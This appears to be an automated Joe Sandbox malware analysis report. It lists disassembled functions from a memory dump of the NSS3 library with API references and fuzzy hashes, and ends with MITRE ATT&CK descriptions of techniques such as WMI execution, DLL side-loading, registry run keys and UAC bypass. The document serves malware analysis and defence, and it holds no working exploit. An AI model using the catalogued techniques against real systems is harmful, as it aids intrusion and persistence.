Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: 2d114328ea5546b2a81a26fb8319d96bcf67b75ebece79c5accba398b36d0c67
Instruction ID: e08f7a98ca3dfcba8dd296c9bd57337ffaa0340996acce7004080445e9d92d2a
Opcode Fuzzy Hash: 2d114328ea5546b2a81a26fb8319d96bcf67b75ebece79c5accba398b36d0c67
Instruction Fuzzy Hash: 09018074A046459BDB00AFBDC084659BBF4FF09398F014A6AD89887B10E730EC95CBDA

Function 6C6E0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7B2F88,6C6E0660,00000020,00000000,?,?,6C6E2C3D,?,00000000,00000000,?,6C6E2A28,00000060,00000001), ref: 6C6E0860

Part of subcall function 6C5D4C70: TlsGetValue.KERNEL32(?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4C97
Part of subcall function 6C5D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CB0
Part of subcall function 6C5D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C6E2C3D,?,00000000,00000000,?,6C6E2A28,00000060,00000001), ref: 6C6E0874
EnterCriticalSection.KERNEL32(00000001), ref: 6C6E0884
PR_Unlock.NSS3 ref: 6C6E08A3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: ccb4feaa9be9edc857ef4c205ac3821db036827882e9c2fbd26eb952217243b6
Instruction ID: df45332b873d05c07957c685a551e83db9c54474ec646a6acffd6ef8d58f92f9
Opcode Fuzzy Hash: ccb4feaa9be9edc857ef4c205ac3821db036827882e9c2fbd26eb952217243b6
Instruction Fuzzy Hash: 0C014736E0A240ABEF002F69EC04E567738DB5A359F080172EC0852A02EF2294549BE9

Function 6C76CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C76CC61
free.MOZGLUE ref: 6C76CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C76CC80
free.MOZGLUE(?), ref: 6C76CC87

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: b357d630eb135e3d4e1088945e24d0e385ea7fa21a82075120949cfa13205548
Instruction ID: b62cb622932d6d95cf8f28def52c6460da53ad28260737f1e9b06ffa0cecdd7c
Opcode Fuzzy Hash: b357d630eb135e3d4e1088945e24d0e385ea7fa21a82075120949cfa13205548
Instruction Fuzzy Hash: 82E03076700608ABCB10EFA8DC4488A77ACEE492723150565E691C3700D232F905CBA1

Function 6C6A4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6A4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C6A4DE6

Strings

%d.%d, xrefs: 6C6A4DDE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: b8c2afe6525a1acae62d6f1e1fbf7d4e661babb0bd20fc33e1848e4fcbf8c6d9
Instruction ID: f3073532db0d69003b4f21911bb83211dddbfb5cc3d21d2ed669e7ef13d2a519
Opcode Fuzzy Hash: b8c2afe6525a1acae62d6f1e1fbf7d4e661babb0bd20fc33e1848e4fcbf8c6d9
Instruction Fuzzy Hash: 5D31FCB2D042186BEB10ABE19C05BFF77A8DF45308F150469ED159B781EB709D06CBAA

Function 6C71EB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C5DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C63F9C9,?,6C63F4DA,6C63F9C9,?,?,6C60369A), ref: 6C5DCA7A
Part of subcall function 6C5DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5DCB26

memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C71EB9B
sqlite3_free.NSS3(00000000), ref: 6C71EBD1

Strings

pvl, xrefs: 6C71EB49, 6C71EBA3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememsetsqlite3_free
String ID: pvl
API String ID: 3148935258-2777824480
Opcode ID: 7708a72498f1b91a680c2afa03e9ede4862c9bce2720a6680d304b33831abd33
Instruction ID: 46171fa6ba55a682df8de43eb62032894ffa86e6dbd7bbd82eaa53be309edf13
Opcode Fuzzy Hash: 7708a72498f1b91a680c2afa03e9ede4862c9bce2720a6680d304b33831abd33
Instruction Fuzzy Hash: 3E01A972A092156B97206BAF9D1CC6B7AEDEFC66A4B04453DF41983A40EA709844C7E2

Function 6C740900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C740917
sqlite3_value_text.NSS3(?), ref: 6C740923

Part of subcall function 6C6013C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5D2352,?,00000000,?,?), ref: 6C601413
Part of subcall function 6C6013C0: memcpy.VCRUNTIME140(00000000,R#]l,00000002,?,?,?,?,6C5D2352,?,00000000,?,?), ref: 6C6014C0

Strings

error in %s %s%s%s: %s, xrefs: 6C740944

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 14955a66686328f7bce97f285222dca6ba45de00872cdfc77ca74aae1785153c
Instruction ID: a5046287f08615c0a0e84a50c1cc7fd0e4d8a87819e3a90c5459c70c85a746f9
Opcode Fuzzy Hash: 14955a66686328f7bce97f285222dca6ba45de00872cdfc77ca74aae1785153c
Instruction Fuzzy Hash: 8C0144F6E001089BEB009E18FD01ABABBB5EFC1218F148438ED485B701F732AD1487A2

Function 6C72AB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000002,?,6C72ABC8,?,?,?,6C72AAD6,?,6C5EAFD3,?,00000002,?,6C70CF46,?,6C5DCDBD), ref: 6C72AB86
sqlite3_free.NSS3(00000002,00000000,?,?,00000002,?,6C72ABC8,?,?,?,6C72AAD6,?,6C5EAFD3,?,00000002), ref: 6C72AB99

Strings

`vl, xrefs: 6C72AB66

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CloseHandlesqlite3_free
String ID: `vl
API String ID: 1933003305-2789490299
Opcode ID: 8ca6e7c0fcdca9406d50f94cae0f8f338f525aca5e23f39a4df4e12befea96d1
Instruction ID: 134892a82edbcfd1fb22351254d604154adefb555c9b2dd4c667821e752608da
Opcode Fuzzy Hash: 8ca6e7c0fcdca9406d50f94cae0f8f338f525aca5e23f39a4df4e12befea96d1
Instruction Fuzzy Hash: AD01F4722442119FDB008F69DC84F1B37BAEB86734F240638E5298B690EA369C04CB50

Function 6C6C4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8ll,00000000,00000000,?,?,6C6C3827,?,00000000), ref: 6C6C4D0A

Part of subcall function 6C6B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C6C4D22

Part of subcall function 6C6AFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C651A3E,00000048,00000054), ref: 6C6AFD56

Strings

'8ll, xrefs: 6C6C4D07

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8ll
API String ID: 1521942269-3147167083
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: e9c045571cb0dc53a02a19017d26fc9ed9119a401a2e55a1fbcf3640a8849614
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: FEF0687270112467DB10AE6A9C4077736DCDB417BDF141271DD18DB781E6B1EC018697

Function 6C6EAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C6EAF78

Part of subcall function 6C64ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64ACE2
Part of subcall function 6C64ACC0: malloc.MOZGLUE(00000001), ref: 6C64ACEC
Part of subcall function 6C64ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C64AD02
Part of subcall function 6C64ACC0: TlsGetValue.KERNEL32 ref: 6C64AD3C
Part of subcall function 6C64ACC0: calloc.MOZGLUE(00000001,?), ref: 6C64AD8C
Part of subcall function 6C64ACC0: PR_Unlock.NSS3 ref: 6C64ADC0
Part of subcall function 6C64ACC0: PR_Unlock.NSS3 ref: 6C64AE8C
Part of subcall function 6C64ACC0: free.MOZGLUE(?), ref: 6C64AEAB

memcpy.VCRUNTIME140(6C7B3084,6C7B02AC,00000090), ref: 6C6EAF94

Strings

SSL, xrefs: 6C6EAF73

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 633dbb0f5b8fcf0114b94b5aaec388b656231d5fef2f48eb3fc923ca137bf525
Instruction ID: 79e1a2b9a945a7cdd6da3c25da324d2b87b92f674a031850191d99d355ed7790
Opcode Fuzzy Hash: 633dbb0f5b8fcf0114b94b5aaec388b656231d5fef2f48eb3fc923ca137bf525
Instruction Fuzzy Hash: 09217BB264EB49EFCA01DF11A547B127E73BF4A308710512AD52A4BB28DB3151889FDD

Function 6C65C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]el,6C656499,-00000078,00000000,?,?,]el,?,6C655DEF,?), ref: 6C65C821

Part of subcall function 6C651DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C651E0B
Part of subcall function 6C651DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C651E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]el,?,6C655DEF,?,?,?), ref: 6C65C857

Strings

]el, xrefs: 6C65C810

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]el
API String ID: 221937774-330632708
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: 7b4c9faabe5f8a9c90743023bdd75d0b5b6b7f49dfa93637da0f78cffbebccff
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: AEF02073A0001877EF012D62AC00AFE3A48CF8A298F540031FE08C2A40FB32D93483EE

Function 6C640F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B

Part of subcall function 6C641370: GetSystemInfo.KERNEL32(?,?,?,?,6C640936,?,6C640F20,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000), ref: 6C64138F

PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

Part of subcall function 6C641110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C640936,00000001,00000040), ref: 6C641130
Part of subcall function 6C641110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C640936,00000001,00000040), ref: 6C641142
Part of subcall function 6C641110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C640936,00000001), ref: 6C641167

Strings

clock, xrefs: 6C640F20

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 7bd507447a5f1976987e775707a9416c202bbc8fe3c1cec1b89e647f1d5c469a
Instruction ID: 1844423cb9bcfea72ee5bdbefba9bbbadc5b925da43fda4c14c0cdf3bf9e1e7c
Opcode Fuzzy Hash: 7bd507447a5f1976987e775707a9416c202bbc8fe3c1cec1b89e647f1d5c469a
Instruction Fuzzy Hash: 48D0123160915495C7116B979C45F96BABCC7C367AF10CC76E22842D104A6450FAD36D

Function 6C6B0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C6B0DF5
TlsGetValue.KERNEL32 ref: 6C6B0E2D
TlsGetValue.KERNEL32 ref: 6C6B0E58
TlsGetValue.KERNEL32 ref: 6C6B0E84

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 462e8037a07cfb7133b150dfb5c5bd2667d678f7e5131b59f1a70f5412d4b6ec
Instruction ID: 744a035fe7b52c0740bfd871d8ace85b4727ddb01dd1260ce638e671f2d8d351
Opcode Fuzzy Hash: 462e8037a07cfb7133b150dfb5c5bd2667d678f7e5131b59f1a70f5412d4b6ec
Instruction Fuzzy Hash: B731E8F0645391CBDB005F78D6446A97FB4BF06348F118679E88897A11EB30D4A7CB89

Function 6C6B0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C652AF5,?,?,?,?,?,6C650A1B,00000000), ref: 6C6B0F1A
malloc.MOZGLUE(00000001), ref: 6C6B0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6B0F42
TlsGetValue.KERNEL32 ref: 6C6B0F5B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: b39978b4c5730ffdd7426da3ea2737f22db2630b4c39097ec18d18a8074fedac
Instruction ID: ae60cf500922c526f57c7762f5cf6f2db0444915f73aba98d3560a5850282183
Opcode Fuzzy Hash: b39978b4c5730ffdd7426da3ea2737f22db2630b4c39097ec18d18a8074fedac
Instruction Fuzzy Hash: 8001DDF1F002506BE7101B3A9F049A67E6CEF52399F014171ED18D6A11EB31C465C7EA

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

